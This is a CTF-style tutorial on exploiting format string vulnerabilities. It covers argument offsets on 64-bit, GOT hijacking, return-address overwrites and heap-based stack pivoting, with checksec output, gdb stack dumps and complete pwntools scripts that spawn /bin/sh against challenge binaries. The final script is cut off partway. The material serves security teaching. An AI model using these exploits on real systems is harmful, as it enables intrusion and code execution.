
# Format string vulnerability examples

This section walks through several format string vulnerabilities from CTF challenges and shows the common ways of exploiting them.

## 64-bit program format string vulnerability

### Principle

Offset calculation in a 64-bit program is similar to the 32-bit case: each conversion specifier still consumes the corresponding argument. The difference is that on 64-bit Linux the first six arguments of a function are passed in registers (RDI, RSI, RDX, RCX, R8, R9), and only the remaining ones are passed on the stack. What does this mean for a format string vulnerability? Even though we never put data into those registers, printf still parses the format string and reads its arguments first from the registers and then from the stack.
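The register rule above can be turned into a small calculation. The following is a minimal sketch, not part of the original write-up: `fmt_index` is a hypothetical helper, and it assumes the System V AMD64 calling convention and that `rsp` is sampled at the first instruction of printf, where it still points at the return address. The example addresses are taken from the GoodLuck debugging session in this section.

```python
WORD = 8        # size of one stack slot on amd64
REG_ARGS = 6    # rdi, rsi, rdx, rcx, r8, r9 (rdi holds the format string)


def fmt_index(target_addr, rsp_at_printf_entry):
    """Return n such that %n$p reads the 8-byte value stored at target_addr.

    Hypothetical helper: assumes rsp was sampled at printf's first
    instruction, so [rsp] is the return address.
    """
    first_stack_arg = rsp_at_printf_entry + WORD      # skip the return address
    slot, rem = divmod(target_addr - first_stack_arg, WORD)
    if rem or slot < 0:
        raise ValueError("target is not an aligned stack argument slot")
    # %1$ .. %5$ read rsi .. r9, so the first stack slot is %6$
    return REG_ARGS + slot


# Pointer to the flag at 0x7fffffffdb28, rsp at 0x7fffffffdb08
print(fmt_index(0x7fffffffdb28, 0x7fffffffdb08))
```

The result is the number to use in `%n$s`. Tools that count the format string itself as the first argument report a value that is one larger.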

### Examples

Here we use [pwn200 GoodLuck](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2017-UIUCTF-pwn200-GoodLuck) from UIUCTF 2017 as an example. Since only a local environment is available, I created a flag.txt file locally.

#### Determining protection

    ➜  2017-UIUCTF-pwn200-GoodLuck git:(master) ✗ checksec goodluck
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)

It can be seen that the program has NX, a stack canary, and Partial RELRO enabled.

#### Analyzing the program

The vulnerability in the program is easy to spot: the user-controlled buffer is passed to printf as the format string.

    for ( j = 0; j <= 21; ++j )
    {
      v5 = format[j];
      if ( !v5 || v11[j] != v5 )
      {
        puts("You answered:");
        printf(format);
        puts("\nBut that was totally wrong lol get rekt");
        fflush(_bss_start);
        result = 0;
        goto LABEL_11;
      }
    }


#### Determining the offset

We set a breakpoint at printf. Here we only focus on the code and stack sections of the output.

    gef➤  b printf
    Breakpoint 1 at 0x400640
    gef➤  r
    Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/2017-UIUCTF-pwn200-GoodLuck/goodluck
    what's the flag
    123456
    You answered:
    Breakpoint 1, __printf (format=0x602830 "123456") at printf.c:28
    28  printf.c: No such file or directory.
    ────────────────────────────────[ code:i386:x86-64 ]────
       0x7ffff7a627f7 <fprintf+135>    add    rsp, 0xd8
       0x7ffff7a627fe <fprintf+142>    ret
       0x7ffff7a627ff                  nop
     → 0x7ffff7a62800 <printf+0>       sub    rsp, 0xd8
       0x7ffff7a62807 <printf+7>       test   al, al
       0x7ffff7a62809 <printf+9>       mov    QWORD PTR [rsp+0x28], rsi
       0x7ffff7a6280e <printf+14>      mov    QWORD PTR [rsp+0x30], rdx
    ────────────────────────────────[ stack ]────
    0x00007fffffffdb08│+0x00: 0x0000000000400890  →  <main+234> mov edi, 0x4009b8    ← $rsp
    0x00007fffffffdb10│+0x08: 0x0000000031000001
    0x00007fffffffdb18│+0x10: 0x0000000000602830  →  0x0000363534333231 ("123456"?)
    0x00007fffffffdb20│+0x18: 0x0000000000602010  →  "You answered:\ng"
    0x00007fffffffdb28│+0x20: 0x00007fffffffdb30  →  "flag{11111111111111111"
    0x00007fffffffdb30│+0x28: "flag{11111111111111111"
    0x00007fffffffdb38│+0x30: "11111111111111"
    0x00007fffffffdb40│+0x38: 0x0000313131313131 ("111111"?)
    ────────────────────────────────[ trace ]────
    [#0] 0x7ffff7a62800 → Name: __printf(format=0x602830 "123456")
    [#1] 0x400890 → Name: main()
    ────────────────────────────────

The pointer to the flag is in the 5th slot on the stack; leaving out the first row, which is the return address, it is the 4th. Because this is a 64-bit program, the first six arguments are passed in registers, and the format string itself is in RDI, so five more arguments (RSI, RDX, RCX, R8, R9) come before the stack slots. Counting the format string as the first argument, the pointer to the flag is therefore the 10th argument of printf. The n in %n$s counts the arguments after the format string, so we only need to send %9$s to print the flag. An easier way is to use fmtarg from https://github.com/scwuaptx/Pwngdb to determine the index of an argument.

    gef➤  fmtarg 0x00007fffffffdb28
    The index of format argument : 10

Note that fmtarg has to be run while the program is stopped at the breakpoint on printf.

#### Exploit

    from pwn import *

    goodluck = ELF('./goodluck')
    if args['REMOTE']:
        sh = remote('pwn.sniperoj.cn', 30017)
    else:
        sh = process('./goodluck')
    # the 9th argument after the format string is the pointer to the flag
    payload = b"%9$s"
    print(payload)
    ##gdb.attach(sh)
    sh.sendline(payload)
    print(sh.recv())
    sh.interactive()


## hijack GOT

### Principle

In current C programs, calls to libc functions go through the GOT. As long as Full RELRO is not enabled, the GOT entry of every libc function is writable. We can therefore overwrite the GOT entry of one libc function with the address of another libc function to take control of the program. For example, we can overwrite the GOT entry of printf with the address of system; from then on, the program actually executes system whenever it calls printf.

Suppose we want to overwrite the GOT entry of function A with the address of function B. The attack can be divided into the following steps.

• Determine the GOT address of function A.
    • Function A is usually already used by the program, so its GOT entry can be found by simply looking up the address in the binary.
• Determine the memory address of function B.
    • This step usually requires us to find a way to leak the address of function B.
• Write the memory address of function B into the GOT entry of function A.
    • This step generally requires a vulnerability in the program to trigger the write. The usual methods are as follows:
        • Write functions: the write function.
        • ROP

              pop eax; ret;           # printf@got -> eax
              pop ebx; ret;           # (addr_offset = system_addr - printf_addr) -> ebx
              add [eax], ebx; ret;    # [printf@got] = [printf@got] + addr_offset

        • Format string arbitrary address write
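The second step, finding the address of function B from a leak, comes down to simple arithmetic once the libc version is known. The sketch below only illustrates that arithmetic: `resolve` is a hypothetical helper, and the offsets and the leaked address are made-up values, not taken from any real libc.

```python
def resolve(leaked_addr, leaked_offset, target_offset):
    """Rebase a libc symbol: libc_base = leaked address - offset of the leaked symbol."""
    libc_base = leaked_addr - leaked_offset
    return libc_base, libc_base + target_offset


# Made-up values for illustration only
PUTS_OFFSET = 0x5f140      # offset of puts inside the (hypothetical) libc
SYSTEM_OFFSET = 0x3a940    # offset of system inside the same libc
leaked_puts = 0xf7e5a140   # value read from puts@got at run time

libc_base, system_addr = resolve(leaked_puts, PUTS_OFFSET, SYSTEM_OFFSET)
print(hex(libc_base), hex(system_addr))
```

A quick sanity check in practice is that the computed base is page aligned; if it is not, the libc version guess is probably wrong.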

### Examples

Here we take [pwn3](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2016-CCTF-pwn3) from CCTF 2016 as an example.

#### Determining protection

The protections are as follows:

    ➜  2016-CCTF-pwn3 git:(master) ✗ checksec pwn3
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)

It can be seen that the program mainly has NX enabled; RELRO is only partial, so the GOT is still writable. As usual, we assume that ASLR is enabled on the system.

#### Analyzing the program

Analyzing the program first, we find that it implements a password-protected FTP-like service with three basic functions: get, put, and dir. Skimming the code of each function reveals a format string vulnerability in get.

    int get_file()
    {
      char dest; // [sp+1Ch] [bp-FCh]@5
      char s1; // [sp+E4h] [bp-34h]@1
      char *i; // [sp+10Ch] [bp-Ch]@3

      printf("enter the file name you want to get:");
      __isoc99_scanf("%40s", &s1);
      if ( !strncmp(&s1, "flag", 4u) )
        puts("too young, too simple");
      for ( i = (char *)file_head; i; i = (char *)*((_DWORD *)i + 60) )
      {
        if ( !strcmp(i, &s1) )
        {
          strcpy(&dest, i + 0x28);
          return printf(&dest);
        }
      }
      return printf(&dest);
    }


#### Exploitation ideas

Since there is a format string vulnerability, we can proceed as follows:

• Bypass the password check
• Determine the offset of the format string argument
• Use puts@got to leak the address of puts, identify the matching libc.so version, and from it obtain the address of system.
• Overwrite the contents of puts@got with the address of system.
• When the program calls puts again, it actually executes system.
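The overwrite step can be done by hand with four `%hhn` writes. The following is a minimal sketch of that idea for a 32-bit target; it is not how pwntools implements `fmtstr_payload`, only an illustration of the byte-by-byte technique. `hhn_payload` is a hypothetical helper, the GOT address and the system address are made-up values, and offset 7 is the format string offset this challenge's exploit uses. It assumes nothing has been printed before the payload and that the addresses contain no null bytes.

```python
import struct


def hhn_payload(offset, addr, value):
    """Build a 32-bit format string that writes `value` to `addr` one byte at a time."""
    # Four target addresses, one per byte, placed at the start of the string
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    printed = len(payload)                    # characters output so far
    for i in range(4):
        byte = (value >> (8 * i)) & 0xff
        pad = (byte - printed) % 256          # extra characters needed (mod 256)
        if pad:
            payload += b"%" + str(pad).encode() + b"c"
            printed += pad
        # %hhn stores the low byte of the running character count
        payload += b"%" + str(offset + i).encode() + b"$hhn"
    return payload


puts_got = 0x0804a028       # made-up GOT address
system_addr = 0xf7e35940    # made-up libc address
print(hhn_payload(7, puts_got, system_addr))
```

Each `%Nc` pads the output so that the running count, taken modulo 256, equals the next byte to be written.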

#### Exploit

The exploit is as follows:

    from pwn import *
    from LibcSearcher import LibcSearcher

    ##context.log_level = 'debug'
    pwn3 = ELF('./pwn3')
    if args['REMOTE']:
        sh = remote('111', 111)
    else:
        sh = process('./pwn3')


    def get(name):
        sh.sendline(b'get')
        sh.recvuntil(b'enter the file name you want to get:')
        sh.sendline(name)
        data = sh.recv()
        return data


    def put(name, content):
        sh.sendline(b'put')
        sh.recvuntil(b'please enter the name of the file you want to upload:')
        sh.sendline(name)
        sh.recvuntil(b'then, enter the content:')
        sh.sendline(content)


    def show_dir():
        sh.sendline(b'dir')


    # build the user name by shifting every character of 'sysbdmin' down by one
    tmp = 'sysbdmin'
    name = ""
    for i in tmp:
        name += chr(ord(i) - 1)


    ## password
    def password():
        sh.recvuntil(b'Name (ftp.hacker.server:Rainism):')
        sh.sendline(name.encode())


    ##password
    password()
    ## get the addr of puts
    puts_got = pwn3.got['puts']
    log.success('puts got : ' + hex(puts_got))
    put(b'1111', b'%8$s' + p32(puts_got))
    puts_addr = u32(get(b'1111')[:4])

    ## get addr of system
    libc = LibcSearcher("puts", puts_addr)
    system_offset = libc.dump('system')
    puts_offset = libc.dump('puts')
    system_addr = puts_addr - puts_offset + system_offset
    log.success('system addr : ' + hex(system_addr))

    ## modify puts@got, point to system_addr
    payload = fmtstr_payload(7, {puts_got: system_addr})
    put(b'/bin/sh;', payload)
    sh.recvuntil(b'ftp>')
    sh.sendline(b'get')
    sh.recvuntil(b'enter the file name you want to get:')
    ##gdb.attach(sh)
    sh.sendline(b'/bin/sh;')

    ## system('/bin/sh')
    show_dir()
    sh.interactive()

Notes

• When leaking the address of puts I used offset 8, because I want the first 4 bytes of the output to be the address of puts. The format string itself starts at offset 7: the 4-byte specifier %8$s fills the slot at offset 7, and the p32(puts_got) that follows it lands in the slot at offset 8.
• I used the fmtstr_payload function from pwntools to build the write payload. If you are interested, check the official documentation. For example, fmtstr_payload(7, {puts_got: system_addr}) means that the format string is at offset 7 and that I want to write system_addr at the address puts_got. By default it writes byte by byte.

## hijack retaddr

### Principle

The idea is straightforward: we use the format string vulnerability to overwrite the return address of a function with an address we want to execute.

### Examples

Here we take [三个白帽-pwnme_k0](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/三个白帽-pwnme_k0) as an example.

#### Determining protection

    ➜  三个白帽-pwnme_k0 git:(master) ✗ checksec pwnme_k0
        Arch:     amd64-64-little
        RELRO:    Full RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)

It can be seen that the program has NX and Full RELRO enabled, so we cannot modify the GOT of the program.
#### Analyzing the program

A brief analysis shows that the program implements something like account registration, with functions to edit and to view the account. The format string vulnerability is in the view function.

    int __usercall sub_400B07@<eax>(char format@<dil>, char formata, __int64 a3, char a4)
    {
      write(0, "Welc0me to sangebaimao!\n", 0x1AuLL);
      printf(&formata, "Welc0me to sangebaimao!\n");
      return printf(&a4 + 4);
    }

The string that is printed is &a4 + 4. Tracing back, we find that this is exactly where the password we enter is read to:

    v6 = read(0, (char *)&a4 + 4, 0x14uLL);

We can also see that the username we enter is stored 20 bytes before the password.

    puts("Input your username(max lenth:20): ");
    fflush(stdout);
    v8 = read(0, &bufa, 0x14uLL);
    if ( v8 && v8 <= 0x14u )
    {
      puts("Input your password(max lenth:20): ");
      fflush(stdout);
      v6 = read(0, (char *)&a4 + 4, 0x14uLL);
      fflush(stdout);
      *(_QWORD *)buf = bufa;
      *(_QWORD *)(buf + 8) = a3;
      *(_QWORD *)(buf + 16) = a4;

That covers the relevant code. We can also see that the username and password are never actually checked against each other.

#### Exploitation ideas

Our ultimate goal is to get a shell. The given binary contains a function at address 0x00000000004008A6 that directly calls system("/bin/sh") (this kind of thing is usually found by skimming through the program first). If we change the return address of some function to this address, we get the shell.

Although the stack address that stores the return address changes from run to run, its position relative to rbp does not, so we can compute it from a leaked rbp. The plan is as follows:

• Determine the offset
• Leak the saved rbp and the return address of the function
• Compute the address where the return address is stored from the relative offset
• Write the address of the code that calls system to the address where the return address is stored.
#### Determining the offset

First, we determine the offset. Enter aaaaaaaa as the username and anything as the password, and set a breakpoint at the printf(&a4 + 4) call that prints the password.

    Register Account first!
    Input your username(max lenth:20):
    aaaaaaaa
    Input your password(max lenth:20):
    %p%p%p%p%p%p%p%p%p%p
    Register Success!!
    1.Sh0w Account Infomation!
    2.Ed1t Account Inf0mation!
    3.QUit sangebaimao:(
    >error options
    1.Sh0w Account Infomation!
    2.Ed1t Account Inf0mation!
    3.QUit sangebaimao:(
    >1
    ...

At this point the stack is

    ────────────────────────────────[ code:i386:x86-64 ]────
         0x400b1a                  call   0x400758
         0x400b1f                  lea    rdi, [rbp+0x10]
         0x400b23                  mov    eax, 0x0
     →   0x400b28                  call   0x400770
       ↳    0x400770                  jmp    QWORD PTR [rip+0x20184a]        # 0x601fc0
            0x400776                  xchg   ax, ax
            0x400778                  jmp    QWORD PTR [rip+0x20184a]        # 0x601fc8
            0x40077e                  xchg   ax, ax
    ────────────────────────────────[ stack ]────
    0x00007fffffffdb40│+0x00: 0x00007fffffffdb80  →  0x00007fffffffdc30  →  0x0000000000400eb0  →   push r15     ← $rsp, $rbp
    0x00007fffffffdb48│+0x08: 0x0000000000400d74  →   add rsp, 0x30
    0x00007fffffffdb50│+0x10: "aaaaaaaa"     ← $rdi
    0x00007fffffffdb58│+0x18: 0x000000000000000a
    0x00007fffffffdb60│+0x20: 0x7025702500000000
    0x00007fffffffdb68│+0x28: "%p%p%p%p%p%p%p%pM\r@"
    0x00007fffffffdb70│+0x30: "%p%p%p%pM\r@"
    0x00007fffffffdb78│+0x38: 0x0000000000400d4d  →   cmp eax, 0x2

The username we entered is in the third slot on the stack. Leaving out the format string itself, five arguments come from registers, so the offset of the username is 5 + 3 = 8.

#### Modifying the address

Let us look carefully at the stack at the breakpoint.

    0x00007fffffffdb40│+0x00: 0x00007fffffffdb80  →  0x00007fffffffdc30  →  0x0000000000400eb0  →   push r15     ← $rsp, $rbp
    0x00007fffffffdb48│+0x08: 0x0000000000400d74  →   add rsp, 0x30
    0x00007fffffffdb50│+0x10: "aaaaaaaa"     ← $rdi
    0x00007fffffffdb58│+0x18: 0x000000000000000a
    0x00007fffffffdb60│+0x20: 0x7025702500000000
    0x00007fffffffdb68│+0x28: "%p%p%p%p%p%p%p%pM\r@"
    0x00007fffffffdb70│+0x30: "%p%p%p%pM\r@"
    0x00007fffffffdb78│+0x38: 0x0000000000400d4d  →   cmp eax, 0x2

The second slot on the stack stores the return address of the function (the value of rip pushed when the show account function was called); its offset in the format string is 7. The first slot stores the rbp of the previous function, at offset 6. From these we get the distance 0x00007fffffffdb80 - 0x00007fffffffdb48 = 0x38, so once we have leaked the saved rbp we know the address where the return address is stored. 0x0000000000400d74 and 0x00000000004008A6 differ only in their low 2 bytes, so we only need to modify the 2 bytes starting at 0x00007fffffffdb48.

Note that on some newer systems (such as Ubuntu 18.04) the program may crash when the return address is changed directly to 0x00000000004008A6. In that case, consider changing the return address to 0x00000000004008AA instead, which skips the function prologue and goes directly to the call to system("/bin/sh").

    .text:00000000004008A6 sub_4008A6      proc near
    .text:00000000004008A6 ; __unwind {
    .text:00000000004008A6                 push    rbp
    .text:00000000004008A7                 mov     rbp, rsp
    .text:00000000004008AA <- here         mov     edi, offset command ; "/bin/sh"
    .text:00000000004008AF                 call    system
    .text:00000000004008B4                 pop     rdi
    .text:00000000004008B5                 pop     rsi
    .text:00000000004008B6                 pop     rdx
    .text:00000000004008B7                 retn

#### Exploit

    from pwn import *

    context.log_level = "debug"
    context.arch = "amd64"

    sh = process("./pwnme_k0")
    binary = ELF("pwnme_k0")
    #gdb.attach(sh)

    # register with any username; the password leaks the saved rbp (offset 6)
    sh.recv()
    sh.writeline(b"1" * 8)
    sh.recv()
    sh.writeline(b"%6$p")
    sh.recv()
    sh.writeline(b"1")
    sh.recvuntil(b"0x")
    ret_addr = int(sh.recvline().strip(), 16) - 0x38
    success("ret_addr:" + hex(ret_addr))

    # edit the account: username = address of the return address (offset 8),
    # password = format string that overwrites its low 2 bytes
    sh.recv()
    sh.writeline(b"2")
    sh.recv()
    sh.sendline(p64(ret_addr))
    sh.recv()
    #sh.writeline(b"%2214d%8$hn")
    #0x4008aa-0x4008a6
    sh.writeline(b"%2218d%8$hn")

    # show the account again to trigger the write
    sh.recv()
    sh.writeline(b"1")
    sh.recv()
    sh.interactive()
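The padding widths 2214 and 2218 in the script above are simply the low 16 bits of the two candidate target addresses written in decimal. A minimal sketch of that calculation follows; `hn_payload` is a hypothetical helper, and it assumes nothing has been printed before the `%d` field.

```python
def hn_payload(target, index):
    """Format string that stores the low 16 bits of `target` through argument `index`."""
    low = target & 0xffff
    # %<low>d pads an integer to `low` characters, then %hn stores the count as 2 bytes
    return "%{}d%{}$hn".format(low, index)


print(hn_payload(0x4008A6, 8))   # %2214d%8$hn
print(hn_payload(0x4008AA, 8))   # %2218d%8$hn
```

Only the low 2 bytes are written, so the upper bytes of the original return address (0x0000000000400d74) are left as they are.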


## Format string vulnerability on the heap

### Principle

A format string on the heap means that the format string itself is stored on the heap. This mainly makes it harder to find the corresponding offset, because in the usual case the format string is very likely to have been copied onto the stack.

### Examples

Here we take [contacts](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2015-CSAW-contacts) from CSAW 2015 as an example.

#### Determining protection

    ➜  2015-CSAW-contacts git:(master) ✗ checksec contacts
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)

It can be seen that the program has not only NX but also a stack canary enabled.

#### Analyzing the program

A quick look shows that the program, as its name suggests, manages contacts: it can create, modify, delete, and print contact information. A closer read reveals a format string vulnerability in the code that prints a contact.

    int __cdecl PrintInfo(int a1, int a2, int a3, char *format)
    {
      printf("\tName: %s\n", a1);
      printf("\tLength %u\n", a2);
      printf("\tPhone #: %s\n", a3);
      printf("\tDescription: ");
      return printf(format);
    }

Looking more closely, format actually points into the heap.

#### Exploitation ideas

Our goal is to get a shell and read the flag. Since there is a format string vulnerability, we would normally control the program flow by hijacking the GOT or by overwriting the return address. Neither is very feasible here, for the following reasons:

• We cannot hijack the GOT: the only function in the program that is called on a string we supply is printf, so it is the only candidate to redirect in order to run system('/bin/sh') on our input. But printf is also used in many other places, so overwriting its GOT entry would crash the program immediately.
• We cannot directly overwrite the return address either: there is no directly executable memory in which to store our content, and using the format string to write system_addr + 'bbbb' + address of '/bin/sh' directly onto the stack does not seem realistic.

So what can we do? We can use a technique introduced earlier for stack overflows: stack pivoting. What we control here happens to be heap memory, so we can move the stack onto the heap. We use the leave instruction to pivot the stack, so beforehand we must change the saved ebp to the value we want; only then does esp take the value we want when leave executes. Because we make this change with the format string, we need to know the address where the saved ebp is stored, but the address where ebp is saved in PrintInfo changes on every run and we have no other way to learn it. However, the ebp value pushed on the stack is itself the address where the caller's saved ebp is stored. So we can modify the ebp saved by the upper function, that is, the ebp of the function above it (the main function). When the upper function returns, main's ebp holds our value, and when main itself returns, the stack is pivoted to the heap.

The basic idea is as follows:

• First, get the address of the system function
    • Leak the address of a libc function and look it up in the libc database.
• Construct a contact description of the form system_addr + 'bbbb' + binsh_addr
• Modify the ebp saved by the upper function (that is, the ebp of the function above it) to the address where system_addr is stored minus 4.
• When the main program returns, the following happens:
    • mov esp, ebp: esp points to the address of system_addr minus 4
    • pop ebp: esp points to system_addr
    • ret: eip points to system_addr, which gives us the shell.
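The last three steps can be checked with a tiny simulation of `leave; ret` over a fake memory image. This is only a sketch for reasoning about the layout: `leave_ret` is a hypothetical helper, memory is modelled as a dict of 32-bit words, and every address below is made up.

```python
def leave_ret(mem, ebp):
    """Simulate `leave; ret` on a dict mapping addresses to 32-bit words."""
    esp = ebp                  # leave, part 1: mov esp, ebp
    ebp = mem[esp]; esp += 4   # leave, part 2: pop ebp
    eip = mem[esp]; esp += 4   # ret: pop eip
    return eip, esp, ebp


# Made-up addresses for illustration only
heap = 0x0804c420              # where the contact description is stored
system_addr = 0xf7e35940
binsh_addr = 0xf7f5402b
mem = {
    heap - 4: 0,               # word just before the description; popped into ebp
    heap:     system_addr,     # becomes eip
    heap + 4: 0x62626262,      # 'bbbb', fake return address for system
    heap + 8: binsh_addr,      # first argument of system
}

eip, esp, _ = leave_ret(mem, heap - 4)
print(hex(eip), hex(mem[esp]), hex(mem[esp + 4]))
```

After the simulated `ret`, `eip` is the system address, the word at `esp` is the fake return address, and the word at `esp + 4` is the pointer to "/bin/sh", which is the layout a cdecl function expects on entry.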

#### Get the relevant addresses and offsets

Here we mainly need the system function address, the /bin/sh address, the address on the stack that stores the contact description, and the address of the PrintInfo function.

First, we derive the system address and the /bin/sh address from the libc_start_main_ret address stored on the stack (the address that main returns to). We construct a contact, choose to print the contact information, set a breakpoint at printf, and run until the printf call with the format string vulnerability, as follows:

    ────────────────────────────────[ code:i386 ]────
     → 0xf7e44670 <printf+0>       call   0xf7f1ab09 <__x86.get_pc_thunk.ax>
       ↳  0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov    eax, DWORD PTR [esp]
          0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
          0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov    edx, DWORD PTR [esp]
          0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
    ────────────────────────────────[ stack ]────
    0xffffccfc│+0x00: 0x08048c27  →   leave      ← $esp
    0xffffcd00│+0x04: 0x0804c420  →  "1234567"
    0xffffcd04│+0x08: 0x0804c410  →  "11111"
    0xffffcd08│+0x0c: 0xf7e5acab  →  <puts+11> add ebx, 0x152355
    0xffffcd0c│+0x10: 0x00000000
    0xffffcd10│+0x14: 0xf7fad000  →  0x001b1db0
    0xffffcd14│+0x18: 0xf7fad000  →  0x001b1db0
    0xffffcd18│+0x1c: 0xffffcd48  →  0xffffcd78  →  0x00000000   ← $ebp
    ────────────────────────────────[ trace ]────
    [#0] 0xf7e44670 → Name: __printf(format=0x804c420 "1234567\n")
    [#1] 0x8048c27 → leave
    [#2] 0x8048c99 → add DWORD PTR [ebp-0xc], 0x1
    [#3] 0x80487a2 → jmp 0x80487b3
    [#4] 0xf7e13637 → Name: __libc_start_main(main=0x80486bd, argc=0x1, argv=0xffffce14, init=0x8048df0, fini=0x8048e60, rtld_fini=0xf7fe88a0 <_dl_fini>, stack_end=0xffffce0c)
    [#5] 0x80485e1 → hlt
    ────────────────────────────────
    gef➤  dereference $esp 140
    0xffffccfc│+0x00: 0x08048c27  →   leave      ← $esp
    gef➤  dereference $esp l140
    0xffffccfc│+0x00: 0x08048c27  →   leave      ← $esp
    0xffffcd00│+0x04: 0x0804c420  →  "1234567"
    0xffffcd04│+0x08: 0x0804c410  →  "11111"
    0xffffcd08│+0x0c: 0xf7e5acab  →  <puts+11> add ebx, 0x152355
    0xffffcd0c│+0x10: 0x00000000
    0xffffcd10│+0x14: 0xf7fad000  →  0x001b1db0
    0xffffcd14│+0x18: 0xf7fad000  →  0x001b1db0
    0xffffcd18│+0x1c: 0xffffcd48  →  0xffffcd78  →  0x00000000   ← $ebp
    0xffffcd1c│+0x20: 0x08048c99  →   add DWORD PTR [ebp-0xc], 0x1
    0xffffcd20│+0x24: 0x0804b0a8  →  "11111"
    0xffffcd24│+0x28: 0x00002b67 ("g+"?)
    0xffffcd28│+0x2c: 0x0804c410  →  "11111"
    0xffffcd2c│+0x30: 0x0804c420  →  "1234567"
    0xffffcd30│+0x34: 0xf7fadd60  →  0xfbad2887
    0xffffcd34│+0x38: 0x08048ed6  →  0x25007325 ("%s"?)
    0xffffcd38│+0x3c: 0x0804b0a0  →  0x0804c420  →  "1234567"
    0xffffcd3c│+0x40: 0x00000000
    0xffffcd40│+0x44: 0xf7fad000  →  0x001b1db0
    0xffffcd44│+0x48: 0x00000000
    0xffffcd48│+0x4c: 0xffffcd78  →  0x00000000
    0xffffcd4c│+0x50: 0x080487a2  →   jmp 0x80487b3
    0xffffcd50│+0x54: 0x0804b0a0  →  0x0804c420  →  "1234567"
    0xffffcd54│+0x58: 0xffffcd68  →  0x00000004
    0xffffcd58│+0x5c: 0x00000050 ("P"?)
    0xffffcd5c│+0x60: 0x00000000
    0xffffcd60│+0x64: 0xf7fad3dc  →  0xf7fae1e0  →  0x00000000
    0xffffcd64│+0x68: 0x08048288  →  0x00000082
    0xffffcd68│+0x6c: 0x00000004
    0xffffcd6c│+0x70: 0x0000000a
    0xffffcd70│+0x74: 0xf7fad000  →  0x001b1db0
    0xffffcd74│+0x78: 0xf7fad000  →  0x001b1db0
    0xffffcd78│+0x7c: 0x00000000
    0xffffcd7c│+0x80: 0xf7e13637  →  <__libc_start_main+247> add esp, 0x10
    0xffffcd80│+0x84: 0x00000001
    0xffffcd84│+0x88: 0xffffce14  →  0xffffd00d  →  "/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/201[...]"
    0xffffcd88│+0x8c: 0xffffce1c  →  0xffffd058  →  "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"

By simple inspection we can see that the slot

    0xffffcd7c│+0x80: 0xf7e13637  →  <__libc_start_main+247> add esp, 0x10

stores the address inside __libc_start_main that main returns to. Using fmtarg we get an index of 32, so its offset relative to the format string is 31.

    gef➤  fmtarg 0xffffcd7c
    The index of format argument : 32

This gives us the leaked address. From it we can identify the matching libc with libc-database and then obtain the address of the system function and of the /bin/sh string.

Second, the slot at 0xffffcd2c, which stores the address of the format string (the contact description on the heap), is at offset 11 relative to the format string; this is what we use when constructing our contacts. Furthermore, the following slot holds the address where the upper function's saved ebp is stored, and its offset relative to the format string is 6, so we can directly modify the ebp saved by the upper function.

    0xffffcd18│+0x1c: 0xffffcd48  →  0xffffcd78  →  0x00000000   ← $ebp


#### Constructing a contact to get the heap address

With the information above, we can use a description of the following form to get the heap address and the corresponding ebp address.

    [system_addr][bbbb][binsh_addr][%6$p][%11$p][bbbb]

The trailing bbbb is a marker that makes the output easier to receive.

Because the function allocates and releases the same amount of stack space on every call, the ebp address we leak does not change when the function is called again.

In some environments the system address contains a \x00 byte. printf then stops at that byte and neither address is leaked, so the payload can be rearranged as follows:

    [%6$p][%11$p][ccc][system_addr][bbbb][binsh_addr][dddd]

With this payload, 12 has to be added to the leaked heap address, because system_addr now starts 12 bytes into the description. This ensures that the truncation at the zero byte only happens after the leak.
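The value 12 is just the length of the text that now precedes system_addr in the description. The short sketch below checks this; the two addresses are made up, and the system address is chosen so that it contains a zero byte.

```python
import struct

# Made-up addresses; system_addr deliberately contains a \x00 byte
system_addr = 0xf7e30040
binsh_addr = 0xf7f5402b

prefix = b"%6$p%11$pccc"    # leak specifiers plus the 'ccc' marker
payload = (prefix + struct.pack("<I", system_addr) + b"bbbb"
           + struct.pack("<I", binsh_addr) + b"dddd")

# Offset of system_addr inside the description
system_off = payload.index(struct.pack("<I", system_addr))
# Part of the description printf processes before hitting the zero byte
visible = payload.split(b"\x00")[0]
print(system_off, visible)
```

Since both leak specifiers sit in front of the first zero byte, they are still processed by printf, and the address to pivot to is the leaked heap address plus `system_off`.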

#### Modify ebp

When main returns it executes leave (mov esp, ebp followed by pop ebp) and then ret, so we need to change the saved ebp to the address where system_addr is stored minus 4. After pop ebp, esp points exactly at the stored system address, and the ret instruction then jumps to system.

We already know the value we want to write (derived from the heap address leaked at offset 11) and that the slot pointing to the saved ebp is at offset 6, so we can construct the following payload to make the change.

    part1 = (heap_addr - 4) // 2
    part2 = heap_addr - 4 - part1
    payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n'

#### Get the shell

After the vulnerable printf has run and control is back in the upper function, we enter 5 to exit the program. main then executes its ret instruction and we get the shell.

#### Exploit

    from pwn import *
    from LibcSearcher import *

    contact = ELF('./contacts')
    ##context.log_level = 'debug'
    if args['REMOTE']:
        sh = remote(11, 111)
    else:
        sh = process('./contacts')


    def createcontact(name, phone, descrip_len, description):
        sh.recvuntil(b'>>>')
        sh.sendline(b'1')
        sh.recvuntil(b'Contact info: \n')
        sh.recvuntil(b'Name: ')
        sh.sendline(name)
        sh.recvuntil(b'You have 10 numbers\n')
        sh.sendline(phone)
        sh.recvuntil(b'Length of description: ')
        sh.sendline(descrip_len)
        sh.recvuntil(b'description:\n\t\t')
        sh.sendline(description)


    def printcontact():
        sh.recvuntil(b'>>>')
        sh.sendline(b'4')
